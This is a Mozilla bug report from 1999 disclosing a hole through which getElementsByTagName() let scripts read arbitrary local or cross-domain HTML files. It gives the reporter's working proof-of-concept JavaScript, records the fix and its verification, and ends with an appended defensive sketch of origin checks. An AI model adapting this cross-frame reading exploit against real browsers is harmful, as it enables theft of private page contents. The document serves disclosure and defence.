Closed Bug 15067 Opened 26 years ago Closed 26 years ago

[DOGFOOD] getElementsByTagName() allows reading of arbitrary HTML files

Categories

(Core :: Security, defect, P3)

x86
Windows 95
defect

VERIFIED FIXED

People

(Reporter: joro, Assigned: norrisboyd)

Details

(Whiteboard: [PDT+])

There is a security vulnerability in Mozilla 5.0 (1999092708 and earlier) which allows reading arbitrary HTML files - local and in any domain. The problem is the method "getElementsByTagName" which allows walking the DOM tree of any HTML file. The code is:
------
function f(o) {
  var s='';
  var i;
  s = o.nodeValue;
  if ( o.childNodes )
    for ( i = 0; i < o.childNodes.length; i++ )
      s += f(o.childNodes[i]);
  return s;
}
setTimeout("a=top.frames[0].document.getElementsByTagName('HTML');s=f(a[0]);alert(s)",14000);
--------
(you need two frames, frames[0] being the file to be read)
Status: NEW → ASSIGNED
Also need to stop access to ranges.
Target Milestone: M12
Summary: getElementsByTagName() allows reading of arbitrary HTML files → [Dogfood] getElementsByTagName() allows reading of arbitrary HTML files
Marking dogfood for analysis by PDT at jar's request.
Summary: [Dogfood] getElementsByTagName() allows reading of arbitrary HTML files → [DOGFOOD] getElementsByTagName() allows reading of arbitrary HTML files
Putting on PDT+ radar.
Whiteboard: [PDT+]
Status: ASSIGNED → RESOLVED
Closed: 26 years ago
Resolution: --- → FIXED
Status: RESOLVED → VERIFIED
Windows NT (1999112908) Com: Javascript Error: uncaught exception: [Exception... "Security error" code: "1000" nsresult: "0x805303e8 (NS_ERROR_DOM_SECURITY_ERR)" location: "http://www.nat.bg/~joro/mozilla/nodes.html Line: 13"]
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General
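Added example (not part of the bug report and not Mozilla's code): a toy model of why the check belongs at the object boundary rather than on individual methods, so that getElementsByTagName, ranges, or any later DOM method gets the same origin test. The names guard, originKey, makeDocument and readFrame, the sample URLs, and the rule that non-http URLs are same-origin only with themselves are assumptions made for this illustration; the error code 1000 mirrors the verification message above.

```javascript
// Illustration only; all names, URLs and the origin rule are constructed.
class DOMSecurityError extends Error {
  constructor(msg) { super(msg); this.name = 'SecurityError'; this.code = 1000; }
}

// Assumption: http(s) origins are scheme+host+port; any other URL (file:, ...)
// counts as same-origin only with itself.
function originKey(url) {
  const u = new URL(url);
  return /^https?:$/.test(u.protocol) ? u.origin : u.href;
}

// Toy document: a node tree plus the one method the report names.
function makeDocument(url, root) {
  const collect = (n, tag, out) => {
    if (n.tagName === tag) out.push(n);
    n.childNodes.forEach(c => collect(c, tag, out));
    return out;
  };
  return { url, root, getElementsByTagName: tag => collect(root, tag, []) };
}

// Every property read and every method result passes through one check, so a
// method added later cannot skip it the way getElementsByTagName did.
function guard(value, callerUrl, docUrl) {
  if (value === null || typeof value !== 'object') return value;
  return new Proxy(value, {
    get(obj, prop) {
      if (originKey(callerUrl) !== originKey(docUrl))
        throw new DOMSecurityError(`Security error: ${String(prop)} denied`);
      const v = obj[prop];
      return typeof v === 'function'
        ? (...args) => guard(v.apply(obj, args), callerUrl, docUrl)
        : guard(v, callerUrl, docUrl);
    },
  });
}

// Same tree walk as the report's f(o), run on behalf of a script from callerUrl.
function readFrame(callerUrl, doc) {
  const walk = n => {
    let s = n.nodeValue || '';
    for (let i = 0; i < n.childNodes.length; i++) s += walk(n.childNodes[i]);
    return s;
  };
  return walk(guard(doc, callerUrl, doc.url).getElementsByTagName('HTML')[0]);
}

// Constructed sample: <HTML><BODY>secret</BODY></HTML>
const text = v => ({ tagName: null, nodeValue: v, childNodes: [] });
const el = (tag, ...kids) => ({ tagName: tag, nodeValue: null, childNodes: kids });
const sample = makeDocument('http://intranet.example/report.html',
  el('HTML', el('BODY', text('secret'))));
```

A same-origin caller reads the text through readFrame; a caller from another host, another port, or a different file: URL gets DOMSecurityError on the first property access.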